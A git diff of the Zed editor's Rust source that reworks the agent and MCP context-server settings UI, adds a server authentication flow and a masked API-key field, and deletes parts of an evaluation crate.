.when(is_running, |this| { - this.child( - Label::new(if tool_count == 1 { - SharedString::from("1 tool") - } else { - SharedString::from(format!("{} tools", tool_count)) - }) - .color(Color::Muted) - .size(LabelSize::Small), - ) - }), + .child(div().min_w_0().flex_1().child( + Label::new(error).color(Color::Muted).size(LabelSize::Small), + )), ) - .child( - h_flex() - .gap_0p5() - .flex_none() - .child(context_server_configuration_menu) - .child( - Switch::new("context-server-switch", is_running.into()) + .when(should_show_logout_button, |this| { + this.child( + Button::new("error-logout-server", "Log Out") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) .on_click({ - let context_server_manager = self.context_server_store.clone(); - let fs = self.fs.clone(); - - move |state, _window, cx| { - let is_enabled = match state { - ToggleState::Unselected - | ToggleState::Indeterminate => { - context_server_manager.update(cx, |this, cx| { - this.stop_server(&context_server_id, cx) - .log_err(); - }); - false - } - ToggleState::Selected => { - context_server_manager.update(cx, |this, cx| { - if let Some(server) = - this.get_server(&context_server_id) - { - this.start_server(server, cx); - } - }); - true - } - }; - update_settings_file(fs.clone(), cx, { - let context_server_id = context_server_id.clone(); - - move |settings, _| { - settings - .project - .context_servers - .entry(context_server_id.0) - .or_insert_with(|| { - settings::ContextServerSettingsContent::Extension { - enabled: is_enabled, - remote: false, - settings: serde_json::json!({}), - } - }) - .set_enabled(is_enabled); - } + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update(cx, |store, cx| { + store.logout_server(&context_server_id, cx).log_err(); }); } }), - ), - ), + ) + }) + .into_any_element(), ) - .map(|parent| { - if let Some(error) = error { - return parent.child( + } else if auth_required { + Some( + feedback_base_container() + .child( h_flex() - .gap_2() .pr_4() - .items_start() + .min_w_0() + .w_full() + .gap_2() .child( - h_flex() - .flex_none() - .h(window.line_height() / 1.6_f32) - .justify_center() - .child( - Icon::new(IconName::XCircle) - .size(IconSize::XSmall) - .color(Color::Error), - ), + Icon::new(IconName::Info) + .size(IconSize::XSmall) + .color(Color::Muted), ) .child( - div().w_full().child( - Label::new(error) - .buffer_font(cx) - .color(Color::Muted) - .size(LabelSize::Small), - ), + Label::new("Authenticate to connect this server") + .color(Color::Muted) + .size(LabelSize::Small), ), - ); - } - parent + ) + .child( + Button::new("error-logout-server", "Authenticate") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) + .on_click({ + let context_server_id = context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update(cx, |store, cx| { + store.authenticate_server(&context_server_id, cx).log_err(); + }); + } + }), + ) + .into_any_element(), + ) + } else if authenticating { + Some( + h_flex() + .mt_1() + .pr_4() + .min_w_0() + .w_full() + .gap_2() + .child(div().size_3().flex_shrink_0()) + .child( + Label::new("Authenticating…") + .color(Color::Muted) + .size(LabelSize::Small), + ) + .into_any_element(), + ) + } else { + None + }; + + let tool_label = if is_running { + Some(if tool_count == 1 { + SharedString::from("1 tool") + } else { + SharedString::from(format!("{} tools", tool_count)) }) + } else { + None + }; + + AiSettingItem::new(item_id, display_name, status, source) + .action(context_server_configuration_menu) + .action( + Switch::new("context-server-switch", is_running.into()).on_click({ + let context_server_manager = self.context_server_store.clone(); + let fs = self.fs.clone(); + + move |state, _window, cx| { + let is_enabled = match state { + ToggleState::Unselected | ToggleState::Indeterminate => { + context_server_manager.update(cx, |this, cx| { + this.stop_server(&context_server_id, cx).log_err(); + }); + false + } + ToggleState::Selected => { + context_server_manager.update(cx, |this, cx| { + if let Some(server) = this.get_server(&context_server_id) { + this.start_server(server, cx); + } + }); + true + } + }; + update_settings_file(fs.clone(), cx, { + let context_server_id = context_server_id.clone(); + + move |settings, _| { + settings + .project + .context_servers + .entry(context_server_id.0) + .or_insert_with(|| { + settings::ContextServerSettingsContent::Extension { + enabled: is_enabled, + remote: false, + settings: serde_json::json!({}), + } + }) + .set_enabled(is_enabled); + } + }); + } + }), + ) + .when_some(tool_label, |this, label| this.detail_label(label)) + .when_some(details, |this, details| this.details(details)) } fn render_agent_servers_section(&mut self, cx: &mut Context) -> impl IntoElement { let agent_server_store = self.agent_server_store.read(cx); - let user_defined_agents = agent_server_store + let agents = agent_server_store .external_agents() .cloned() .collect::>(); - let user_defined_agents: Vec<_> = user_defined_agents + let agents: Vec<_> = agents .into_iter() .map(|name| { let icon = if let Some(icon_path) = agent_server_store.agent_icon(&name) { @@ -962,10 +1008,11 @@ impl AgentConfiguration { .trigger( Button::new("add-agent", "Add Agent") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -1019,6 +1066,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child( @@ -1028,24 +1076,31 @@ impl AgentConfiguration { "All agents connected through the Agent Client Protocol.", add_agent_popover.into_any_element(), )) - .child(v_flex().p_4().pt_0().gap_2().map(|mut parent| { - let mut first = true; - for (name, icon, display_name, source) in user_defined_agents { - if !first { - parent = parent - .child(Divider::horizontal().color(DividerColor::BorderFaded)); - } - first = false; - parent = parent.child(self.render_agent_server( - icon, - name, - display_name, - source, - cx, - )); - } - parent - })), + .child( + v_flex() + .p_4() + .pt_0() + .gap_2() + .children(Itertools::intersperse_with( + agents + .into_iter() + .map(|(name, icon, display_name, source)| { + self.render_agent_server( + icon, + name, + display_name, + source, + cx, + ) + .into_any_element() + }), + || { + Divider::horizontal() + .color(DividerColor::BorderFaded) + .into_any_element() + }, + )), + ), ) } @@ -1069,27 +1124,46 @@ impl AgentConfiguration { .color(Color::Muted), }; - let source_badge = match source { - ExternalAgentSource::Extension => Some(( - SharedString::new(format!("agent-source-{}", id)), - SharedString::from(format!( - "The {} agent was installed from an extension.", - display_name - )), - IconName::ZedSrcExtension, - )), - ExternalAgentSource::Registry => Some(( - SharedString::new(format!("agent-source-{}", id)), - SharedString::from(format!( - "The {} agent was installed from the ACP registry.", - display_name - )), - IconName::AcpRegistry, - )), - ExternalAgentSource::Custom => None, + let source_kind = match source { + ExternalAgentSource::Extension => AiSettingItemSource::Extension, + ExternalAgentSource::Registry => AiSettingItemSource::Registry, + ExternalAgentSource::Custom => AiSettingItemSource::Custom, }; - let agent_server_name = ExternalAgentServerName(id.clone()); + let agent_server_name = AgentId(id.clone()); + let agent = Agent::Custom { + id: agent_server_name.clone(), + }; + + let connection_status = self + .agent_connection_store + .read(cx) + .connection_status(&agent, cx); + + let restart_button = matches!( + connection_status, + AgentConnectionStatus::Connected | AgentConnectionStatus::Connecting + ) + .then(|| { + IconButton::new( + SharedString::from(format!("restart-{}", id)), + IconName::RotateCw, + ) + .disabled(connection_status == AgentConnectionStatus::Connecting) + .icon_color(Color::Muted) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Restart Agent Connection")) + .on_click(cx.listener({ + let agent = agent.clone(); + move |this, _, _window, cx| { + let server: Rc = + Rc::new(agent_servers::CustomAgentServer::new(agent.id())); + this.agent_connection_store.update(cx, |store, cx| { + store.restart_connection(agent.clone(), server, cx); + }); + } + })) + }); let uninstall_button = match source { ExternalAgentSource::Extension => Some( @@ -1140,35 +1214,46 @@ impl AgentConfiguration { })), ) } - ExternalAgentSource::Custom => None, + ExternalAgentSource::Custom => { + let fs = self.fs.clone(); + Some( + IconButton::new( + SharedString::from(format!("uninstall-{}", id)), + IconName::Trash, + ) + .icon_color(Color::Muted) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Remove Custom Agent")) + .on_click(cx.listener(move |_, _, _window, cx| { + let agent_name = agent_server_name.clone(); + update_settings_file(fs.clone(), cx, move |settings, _| { + let Some(agent_servers) = settings.agent_servers.as_mut() else { + return; + }; + if let Some(entry) = agent_servers.get(agent_name.0.as_ref()) + && matches!( + entry, + settings::CustomAgentServerSettings::Custom { .. } + ) + { + agent_servers.remove(agent_name.0.as_ref()); + } + }); + })), + ) + } }; - h_flex() - .gap_1() - .justify_between() - .child( - h_flex() - .gap_1p5() - .child(icon) - .child(Label::new(display_name)) - .when_some(source_badge, |this, (tooltip_id, tooltip_message, icon)| { - this.child( - div() - .id(tooltip_id) - .flex_none() - .tooltip(Tooltip::text(tooltip_message)) - .child(Icon::new(icon).size(IconSize::Small).color(Color::Muted)), - ) - }) - .child( - Icon::new(IconName::Check) - .color(Color::Success) - .size(IconSize::Small), - ), - ) - .when_some(uninstall_button, |this, uninstall_button| { - this.child(uninstall_button) - }) + let status = match connection_status { + AgentConnectionStatus::Disconnected => AiSettingItemStatus::Stopped, + AgentConnectionStatus::Connecting => AiSettingItemStatus::Starting, + AgentConnectionStatus::Connected => AiSettingItemStatus::Running, + }; + + AiSettingItem::new(id, display_name, status, source_kind) + .icon(icon) + .when_some(restart_button, |this, button| this.action(button)) + .when_some(uninstall_button, |this, button| this.action(button)) } } @@ -1190,9 +1275,10 @@ impl Render for AgentConfiguration { .id("assistant-configuration-content") .track_scroll(&self.scroll_handle) .size_full() + .min_w_0() .overflow_y_scroll() .child(self.render_agent_servers_section(cx)) - .child(self.render_context_servers_section(window, cx)) + .child(self.render_context_servers_section(cx)) .child(self.render_provider_configuration_section(cx)), ) .vertical_scrollbar_for(&self.scroll_handle, window, cx), @@ -1306,38 +1392,45 @@ async fn open_new_agent_servers_entry_in_settings_editor( let settings = cx.global::(); let mut unique_server_name = None; - let edits = settings.edits_for_update(&text, |settings| { - let server_name: Option = (0..u8::MAX) - .map(|i| { - if i == 0 { - "your_agent".to_string() - } else { - format!("your_agent_{}", i) - } - }) - .find(|name| { - !settings - .agent_servers - .as_ref() - .is_some_and(|agent_servers| agent_servers.contains_key(name.as_str())) - }); - if let Some(server_name) = server_name { - unique_server_name = Some(SharedString::from(server_name.clone())); - settings.agent_servers.get_or_insert_default().insert( - server_name, - settings::CustomAgentServerSettings::Custom { - path: "path_to_executable".into(), - args: vec![], - env: HashMap::default(), - default_mode: None, - default_model: None, - favorite_models: vec![], - default_config_options: Default::default(), - favorite_config_option_values: Default::default(), - }, - ); - } - }); + let Some(edits) = settings + .edits_for_update(&text, |settings| { + let server_name: Option = (0..u8::MAX) + .map(|i| { + if i == 0 { + "your_agent".to_string() + } else { + format!("your_agent_{}", i) + } + }) + .find(|name| { + !settings + .agent_servers + .as_ref() + .is_some_and(|agent_servers| { + agent_servers.contains_key(name.as_str()) + }) + }); + if let Some(server_name) = server_name { + unique_server_name = Some(SharedString::from(server_name.clone())); + settings.agent_servers.get_or_insert_default().insert( + server_name, + settings::CustomAgentServerSettings::Custom { + path: "path_to_executable".into(), + args: vec![], + env: HashMap::default(), + default_mode: None, + default_model: None, + favorite_models: vec![], + default_config_options: Default::default(), + favorite_config_option_values: Default::default(), + }, + ); + } + }) + .log_err() + else { + return; + }; if edits.is_empty() { return; diff --git a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs index a3a389ac0a068d92112ee98caacb2986c499ad86..e0df79ba4dfe226652818b120b7bfcc493c73b1e 100644 --- a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs +++ b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs @@ -68,14 +68,17 @@ impl AddLlmProviderInput { let provider_name = single_line_input("Provider Name", provider.name(), None, 1, window, cx); let api_url = single_line_input("API URL", provider.api_url(), None, 2, window, cx); - let api_key = single_line_input( - "API Key", - "000000000000000000000000000000000000000000000000", - None, - 3, - window, - cx, - ); + let api_key = cx.new(|cx| { + InputField::new( + window, + cx, + "000000000000000000000000000000000000000000000000", + ) + .label("API Key") + .tab_index(3) + .tab_stop(true) + .masked(true) + }); Self { provider_name, @@ -199,6 +202,7 @@ impl ModelInput { .text(cx) .parse::() .map_err(|_| SharedString::from("Max Tokens must be a number"))?, + reasoning_effort: None, capabilities: ModelCapabilities { tools: self.capabilities.supports_tools.selected(), images: self.capabilities.supports_images.selected(), @@ -340,10 +344,11 @@ impl AddLlmProviderModal { .child(Label::new("Models").size(LabelSize::Small)) .child( Button::new("add-model", "Add Model") - .icon(IconName::Plus) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener(|this, _, window, cx| { this.input.add_model(window, cx); @@ -446,10 +451,11 @@ impl AddLlmProviderModal { .when(has_more_than_one_model, |this| { this.child( Button::new(("remove-model", ix), "Remove Model") - .icon(IconName::Trash) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .style(ButtonStyle::Outlined) .full_width() @@ -808,9 +814,9 @@ mod tests { cx.update(|cx| { let store = SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); - language_model::init_settings(cx); + language_model::init(cx); editor::init(cx); }); diff --git a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs index 38805f2c26693f168c7273afddf5aceea44f83e3..9c44288e1cd23cd3bb0d6876f086c3f0e89dc4c7 100644 --- a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs +++ b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs @@ -1,26 +1,28 @@ -use std::sync::{Arc, Mutex}; - use anyhow::{Context as _, Result}; use collections::HashMap; use context_server::{ContextServerCommand, ContextServerId}; use editor::{Editor, EditorElement, EditorStyle}; + use gpui::{ AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle, - Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, + Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, }; use language::{Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use notifications::status_toast::{StatusToast, ToastIcon}; +use parking_lot::Mutex; use project::{ context_server_store::{ - ContextServerStatus, ContextServerStore, registry::ContextServerDescriptorRegistry, + ContextServerStatus, ContextServerStore, ServerStatusChangedEvent, + registry::ContextServerDescriptorRegistry, }, project_settings::{ContextServerSettings, ProjectSettings}, worktree_store::WorktreeStore, }; use serde::Deserialize; use settings::{Settings as _, update_settings_file}; -use theme::ThemeSettings; +use std::sync::Arc; +use theme_settings::ThemeSettings; use ui::{ CommonAnimationExt, KeyBinding, Modal, ModalFooter, ModalHeader, Section, Tooltip, WithScrollbar, prelude::*, @@ -237,6 +239,8 @@ fn context_server_input(existing: Option<(ContextServerId, ContextServerCommand) format!( r#"{{ + /// Configure an MCP server that runs locally via stdin/stdout + /// /// The name of your MCP server "{name}": {{ /// The command which runs the MCP server @@ -280,6 +284,8 @@ fn context_server_http_input( format!( r#"{{ + /// Configure an MCP server that you connect to over HTTP + /// /// The name of your remote MCP server "{name}": {{ /// The URL of the remote MCP server @@ -342,6 +348,8 @@ fn resolve_context_server_extension( enum State { Idle, Waiting, + AuthRequired { server_id: ContextServerId }, + Authenticating { _server_id: ContextServerId }, Error(SharedString), } @@ -352,6 +360,7 @@ pub struct ConfigureContextServerModal { state: State, original_server_id: Option, scroll_handle: ScrollHandle, + _auth_subscription: Option, } impl ConfigureContextServerModal { @@ -475,6 +484,7 @@ impl ConfigureContextServerModal { cx, ), scroll_handle: ScrollHandle::new(), + _auth_subscription: None, }) }) }) @@ -486,6 +496,13 @@ impl ConfigureContextServerModal { } fn confirm(&mut self, _: &menu::Confirm, cx: &mut Context) { + if matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ) { + return; + } + self.state = State::Idle; let Some(workspace) = self.workspace.upgrade() else { return; @@ -515,14 +532,19 @@ impl ConfigureContextServerModal { async move |this, cx| { let result = wait_for_context_server_task.await; this.update(cx, |this, cx| match result { - Ok(_) => { + Ok(ContextServerStatus::Running) => { this.state = State::Idle; this.show_configured_context_server_toast(id, cx); cx.emit(DismissEvent); } + Ok(ContextServerStatus::AuthRequired) => { + this.state = State::AuthRequired { server_id: id }; + cx.notify(); + } Err(err) => { this.set_error(err, cx); } + Ok(_) => {} }) } }) @@ -558,6 +580,49 @@ impl ConfigureContextServerModal { cx.emit(DismissEvent); } + fn authenticate(&mut self, server_id: ContextServerId, cx: &mut Context) { + self.context_server_store.update(cx, |store, cx| { + store.authenticate_server(&server_id, cx).log_err(); + }); + + self.state = State::Authenticating { + _server_id: server_id.clone(), + }; + + self._auth_subscription = Some(cx.subscribe( + &self.context_server_store, + move |this, _, event: &ServerStatusChangedEvent, cx| { + if event.server_id != server_id { + return; + } + match &event.status { + ContextServerStatus::Running => { + this._auth_subscription = None; + this.state = State::Idle; + this.show_configured_context_server_toast(event.server_id.clone(), cx); + cx.emit(DismissEvent); + } + ContextServerStatus::AuthRequired => { + this._auth_subscription = None; + this.state = State::AuthRequired { + server_id: event.server_id.clone(), + }; + cx.notify(); + } + ContextServerStatus::Error(error) => { + this._auth_subscription = None; + this.set_error(error.clone(), cx); + } + ContextServerStatus::Authenticating + | ContextServerStatus::Starting + | ContextServerStatus::Stopped => {} + } + }, + )); + + cx.notify(); + } + fn show_configured_context_server_toast(&self, id: ContextServerId, cx: &mut App) { self.workspace .update(cx, { @@ -615,7 +680,8 @@ impl ConfigureContextServerModal { } fn render_modal_description(&self, window: &mut Window, cx: &mut Context) -> AnyElement { - const MODAL_DESCRIPTION: &str = "Visit the MCP server configuration docs to find all necessary arguments and environment variables."; + const MODAL_DESCRIPTION: &str = + "Check the server docs for required arguments and environment variables."; if let ConfigurationSource::Extension { installation_instructions: Some(installation_instructions), @@ -637,6 +703,67 @@ impl ConfigureContextServerModal { } } + fn render_tab_bar(&self, cx: &mut Context) -> Option { + let is_http = match &self.source { + ConfigurationSource::New { is_http, .. } => *is_http, + _ => return None, + }; + + let tab = |label: &'static str, active: bool| { + div() + .id(label) + .cursor_pointer() + .p_1() + .text_sm() + .border_b_1() + .when(active, |this| { + this.border_color(cx.theme().colors().border_focused) + }) + .when(!active, |this| { + this.border_color(gpui::transparent_black()) + .text_color(cx.theme().colors().text_muted) + .hover(|s| s.text_color(cx.theme().colors().text)) + }) + .child(label) + }; + + Some( + h_flex() + .pt_1() + .mb_2p5() + .gap_1() + .border_b_1() + .border_color(cx.theme().colors().border.opacity(0.5)) + .child( + tab("Local", !is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if *is_http { + *is_http = false; + let new_text = context_server_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .child( + tab("Remote", is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if !*is_http { + *is_http = true; + let new_text = context_server_http_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .into_any_element(), + ) + } + fn render_modal_content(&self, cx: &App) -> AnyElement { let editor = match &self.source { ConfigurationSource::New { editor, .. } => editor, @@ -682,7 +809,10 @@ impl ConfigureContextServerModal { fn render_modal_footer(&self, cx: &mut Context) -> ModalFooter { let focus_handle = self.focus_handle(cx); - let is_connecting = matches!(self.state, State::Waiting); + let is_busy = matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ); ModalFooter::new() .start_slot::
- - -
- -
-
-
- -
- Thread 1 of 1: - Default Thread -
- -
- - - - - - - - - - - - -
TurnTextToolResult
- - - - diff --git a/crates/eval/src/explorer.rs b/crates/eval/src/explorer.rs deleted file mode 100644 index 3326070cea4e860210f8ba7e0038fec2f3404c30..0000000000000000000000000000000000000000 --- a/crates/eval/src/explorer.rs +++ /dev/null @@ -1,182 +0,0 @@ -use anyhow::{Context as _, Result}; -use clap::Parser; -use serde_json::{Value, json}; -use std::fs; -use std::path::{Path, PathBuf}; - -#[derive(Parser, Debug)] -#[clap(about = "Generate HTML explorer from JSON thread files")] -struct Args { - /// Paths to JSON files or directories. If a directory is provided, - /// it will be searched for 'last.messages.json' files up to 2 levels deep. - #[clap(long, required = true, num_args = 1..)] - input: Vec, - - /// Path where the output HTML file will be written - #[clap(long)] - output: PathBuf, -} - -/// Recursively finds files with `target_filename` in `dir_path` up to `max_depth`. -#[allow(dead_code)] -fn find_target_files_recursive( - dir_path: &Path, - target_filename: &str, - current_depth: u8, - max_depth: u8, - found_files: &mut Vec, -) -> Result<()> { - if current_depth > max_depth { - return Ok(()); - } - - for entry_result in fs::read_dir(dir_path) - .with_context(|| format!("Failed to read directory: {}", dir_path.display()))? - { - let entry = entry_result.with_context(|| { - format!("Failed to read directory entry in: {}", dir_path.display()) - })?; - let path = entry.path(); - - if path.is_dir() { - find_target_files_recursive( - &path, - target_filename, - current_depth + 1, - max_depth, - found_files, - )?; - } else if path.is_file() - && let Some(filename_osstr) = path.file_name() - && let Some(filename_str) = filename_osstr.to_str() - && filename_str == target_filename - { - found_files.push(path); - } - } - Ok(()) -} - -pub fn generate_explorer_html(input_paths: &[PathBuf], output_path: &PathBuf) -> Result { - if let Some(parent) = output_path.parent() - && !parent.exists() - { - fs::create_dir_all(parent).context(format!( - "Failed to create output directory: {}", - parent.display() - ))?; - } - - let template_path = PathBuf::from(env!("CARGO_MANIFEST_DIR")).join("src/explorer.html"); - let template_content = fs::read_to_string(&template_path).context(format!( - "Template file not found or couldn't be read: {}", - template_path.display() - ))?; - - if input_paths.is_empty() { - println!( - "No input JSON files found to process. Explorer will be generated with template defaults or empty data." - ); - } - - let threads = input_paths - .iter() - .map(|input_path| { - let file_content = fs::read_to_string(input_path) - .context(format!("Failed to read file: {}", input_path.display()))?; - let mut thread_data: Value = file_content - .parse::() - .context(format!("Failed to parse JSON from file: {}", input_path.display()))?; - - if let Some(obj) = thread_data.as_object_mut() { - obj.insert("filename".to_string(), json!(input_path.display().to_string())); - } else { - eprintln!("Warning: JSON data in {} is not a root object. Wrapping it to include filename.", input_path.display()); - thread_data = json!({ - "original_data": thread_data, - "filename": input_path.display().to_string() - }); - } - Ok(thread_data) - }) - .collect::>>()?; - - let all_threads_data = json!({ "threads": threads }); - let html_content = inject_thread_data(template_content, all_threads_data)?; - fs::write(&output_path, &html_content) - .context(format!("Failed to write output: {}", output_path.display()))?; - - println!( - "Saved data from {} resolved file(s) ({} threads) to {}", - input_paths.len(), - threads.len(), - output_path.display() - ); - Ok(html_content) -} - -fn inject_thread_data(template: String, threads_data: Value) -> Result { - let injection_marker = "let threadsData = window.threadsData || { threads: [dummyThread] };"; - if !template.contains(injection_marker) { - anyhow::bail!( - "Could not find the thread injection point in the template. Expected: '{}'", - injection_marker - ); - } - - let threads_json_string = serde_json::to_string_pretty(&threads_data) - .context("Failed to serialize threads data to JSON")? - .replace("", r"<\/script>"); - - let script_injection = format!("let threadsData = {};", threads_json_string); - let final_html = template.replacen(injection_marker, &script_injection, 1); - - Ok(final_html) -} - -#[cfg(not(any(test, doctest)))] -#[allow(dead_code)] -fn main() -> Result<()> { - let args = Args::parse(); - - const DEFAULT_FILENAME: &str = "last.messages.json"; - const MAX_SEARCH_DEPTH: u8 = 2; - - let mut resolved_input_files: Vec = Vec::new(); - - for input_path_arg in &args.input { - if !input_path_arg.exists() { - eprintln!( - "Warning: Input path {} does not exist. Skipping.", - input_path_arg.display() - ); - continue; - } - - if input_path_arg.is_dir() { - find_target_files_recursive( - input_path_arg, - DEFAULT_FILENAME, - 0, // starting depth - MAX_SEARCH_DEPTH, - &mut resolved_input_files, - ) - .with_context(|| { - format!( - "Error searching for '{}' files in directory: {}", - DEFAULT_FILENAME, - input_path_arg.display() - ) - })?; - } else if input_path_arg.is_file() { - resolved_input_files.push(input_path_arg.clone()); - } - } - - resolved_input_files.sort_unstable(); - resolved_input_files.dedup(); - - println!("No input paths provided/found."); - - generate_explorer_html(&resolved_input_files, &args.output).map(|_| ()) -} diff --git a/crates/eval/src/ids.rs b/crates/eval/src/ids.rs deleted file mode 100644 index 7057344206ba1530db5034fc2ed5d73e52b41382..0000000000000000000000000000000000000000 --- a/crates/eval/src/ids.rs +++ /dev/null @@ -1,29 +0,0 @@ -use anyhow::{Context as _, Result}; -use std::fs; -use std::path::{Path, PathBuf}; -use uuid::Uuid; - -pub fn get_or_create_id(path: &Path) -> Result { - if let Ok(id) = fs::read_to_string(path) { - let trimmed = id.trim(); - if !trimmed.is_empty() { - return Ok(trimmed.to_string()); - } - } - let new_id = Uuid::new_v4().to_string(); - fs::create_dir_all(path.parent().context("invalid id path")?)?; - fs::write(path, &new_id)?; - Ok(new_id) -} - -pub fn eval_system_id_path() -> PathBuf { - dirs::data_local_dir() - .unwrap_or_else(|| PathBuf::from(".")) - .join("zed-eval-system-id") -} - -pub fn eval_installation_id_path() -> PathBuf { - dirs::data_local_dir() - .unwrap_or_else(|| PathBuf::from(".")) - .join("zed-eval-installation-id") -} diff --git a/crates/eval/src/instance.rs b/crates/eval/src/instance.rs deleted file mode 100644 index 54e6ab0b925191c16885b8b8ed89369039c467f6..0000000000000000000000000000000000000000 --- a/crates/eval/src/instance.rs +++ /dev/null @@ -1,1446 +0,0 @@ -use agent::ContextServerRegistry; -use agent_client_protocol as acp; -use anyhow::{Context as _, Result, anyhow, bail}; -use client::proto::LspWorkProgress; -use futures::channel::mpsc; -use futures::future::Shared; -use futures::{FutureExt as _, StreamExt as _, future}; -use gpui::{App, AppContext as _, AsyncApp, Entity, Task}; -use handlebars::Handlebars; -use language::{Buffer, DiagnosticSeverity, OffsetRangeExt as _}; -use language_model::{ - LanguageModel, LanguageModelCompletionEvent, LanguageModelRegistry, LanguageModelRequest, - LanguageModelRequestMessage, LanguageModelToolResultContent, MessageContent, Role, TokenUsage, -}; -use project::{DiagnosticSummary, Project, ProjectPath, lsp_store::OpenLspBufferHandle}; -use prompt_store::{ProjectContext, WorktreeContext}; -use rand::{distr, prelude::*}; -use serde::{Deserialize, Serialize}; -use std::{ - fmt::Write as _, - fs::{self, File}, - io::Write as _, - path::{Path, PathBuf}, - rc::Rc, - sync::{Arc, Mutex}, - time::Duration, -}; -use unindent::Unindent as _; -use util::{ResultExt as _, command::new_command, markdown::MarkdownCodeBlock}; - -use crate::{ - AgentAppState, ToolMetrics, - assertions::{AssertionsReport, RanAssertion, RanAssertionResult}, - example::{Example, ExampleContext, FailedAssertion, JudgeAssertion}, -}; - -pub const ZED_REPO_URL: &str = "https://github.com/zed-industries/zed.git"; - -#[derive(Clone)] -pub struct ExampleInstance { - pub thread: Rc, - pub name: String, - pub run_directory: PathBuf, - pub log_prefix: String, - /// The repetition number for this example (0-based) - /// When running multiple repetitions of the same example, each instance is assigned a unique repetition number. - /// This affects the worktree path and log prefix to avoid clobbering results between runs. - pub repetition: usize, - pub repo_path: PathBuf, - /// Path to the directory containing the requests and responses for the agentic loop - worktrees_dir: PathBuf, -} - -#[derive(Debug, Serialize, Clone)] -pub struct RunOutput { - pub repository_diff: String, - pub diagnostic_summary_before: DiagnosticSummary, - pub diagnostic_summary_after: DiagnosticSummary, - pub diagnostics_before: Option, - pub diagnostics_after: Option, - pub token_usage: TokenUsage, - pub tool_metrics: ToolMetrics, - pub thread_markdown: String, - pub programmatic_assertions: AssertionsReport, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JudgeDiffInput { - pub repository_diff: String, - pub assertion: String, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JudgeThreadInput { - pub messages: String, - pub assertion: String, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct JudgeOutput { - pub thread: AssertionsReport, - pub diff: AssertionsReport, -} - -impl ExampleInstance { - pub fn new( - thread: Rc, - repos_dir: &Path, - run_dir: &Path, - worktrees_dir: &Path, - repetition: usize, - ) -> Self { - let name = thread.meta().name; - let run_directory = run_dir.join(&name).join(repetition.to_string()); - - let repo_path = repo_path_for_url(repos_dir, &thread.meta().url); - - Self { - name, - thread, - log_prefix: String::new(), - run_directory, - repetition, - repo_path, - worktrees_dir: worktrees_dir.to_path_buf(), - } - } - - pub fn repo_url(&self) -> String { - self.thread.meta().url - } - - pub fn revision(&self) -> String { - self.thread.meta().revision - } - - pub fn worktree_name(&self) -> String { - format!("{}-{}", self.name, self.repetition) - } - - pub fn set_log_prefix_style(&mut self, color: &str, name_width: usize) { - self.log_prefix = format!( - "{}{: Result<()> { - let meta = self.thread.meta(); - - let revision_exists = run_git( - &self.repo_path, - &["rev-parse", &format!("{}^{{commit}}", &meta.revision)], - ) - .await - .is_ok(); - - if !revision_exists { - println!("{}Fetching revision {}", self.log_prefix, &meta.revision); - run_git( - &self.repo_path, - &["fetch", "--depth", "1", "origin", &meta.revision], - ) - .await?; - } - Ok(()) - } - - /// Set up the example by checking out the specified Git revision - pub async fn setup(&mut self) -> Result<()> { - let worktree_path = self.worktree_path(); - let meta = self.thread.meta(); - if worktree_path.is_dir() { - println!("{}Resetting existing worktree", self.log_prefix); - - // TODO: consider including "-x" to remove ignored files. The downside of this is that - // it will also remove build artifacts, and so prevent incremental reuse there. - run_git(&worktree_path, &["clean", "--force", "-d"]).await?; - run_git(&worktree_path, &["reset", "--hard", "HEAD"]).await?; - run_git(&worktree_path, &["checkout", &meta.revision]).await?; - } else { - println!("{}Creating worktree", self.log_prefix); - - let worktree_path_string = worktree_path.to_string_lossy().into_owned(); - - run_git( - &self.repo_path, - &[ - "worktree", - "add", - "-f", - &worktree_path_string, - &meta.revision, - ], - ) - 